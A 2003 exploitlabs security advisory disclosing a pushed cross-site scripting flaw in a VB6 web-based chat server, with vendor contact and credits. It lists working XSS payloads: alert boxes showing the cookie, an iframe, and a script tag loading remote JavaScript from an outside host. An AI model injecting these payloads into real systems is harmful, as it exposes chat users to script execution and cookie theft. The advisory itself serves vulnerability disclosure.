------------------------------------------------------------------
- EXPL-A-2003-019 exploitlabs.com Advisory 019
------------------------------------------------------------------
-= CHAT SERVER =-

exploitlabs
Aug 08, 2003

Product:
--------
Chat Server ( by author of "Sleuth 1.4" )
http://sandsprite.com/codestuff.asp

download and vb6 sources:

http://sandsprite.com/CodeStuff/chatserver.zip

Vunerability(s):
----------------
XSS ( push through )

Description of product:
-----------------------
Web browser based chatserver similar
to the Magma Chatserver that powers huge
sights like chatropolis.com. This will show
just how they can stream text into a browser
and display it realtime. Have an unlimited
number of people all chatting at once using
only their web browsers :) pretty neat

chatserver is an server application
and runs by default on port 80

note: chatropolis.com is not affected

VUNERABILITY / EXPLOIT
======================

XSS is able to be "pushed" from one
chatter to another, with the results being
"forced" into any other chatters browser
for execution.

examples:

<script>alert("You are vunerable to xss ")</script>

<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);<
/SC
RIPT>

<iframe src="http://whatismyip.com"></iframe>

<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js"
type="text/javascript"></script>

note: the last one is remote code.

the vunerability exists in the sample provided and after compiling from
the provided sources.

Local:
------
yes

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
Concurrent with this advisory
dzzie (at) yahoo (dot) com [email concealed]

Credits:
--------

Donnie Werner
morning_wood (at) e2-labs (dot) com [email concealed]
http://e2-labs.com
http://exploitlabs.com

original advisory may be obtained at
http://exploitlabs.com/files/advisories/EXPL-A-2003-019-chatserver.txt

[ reply ]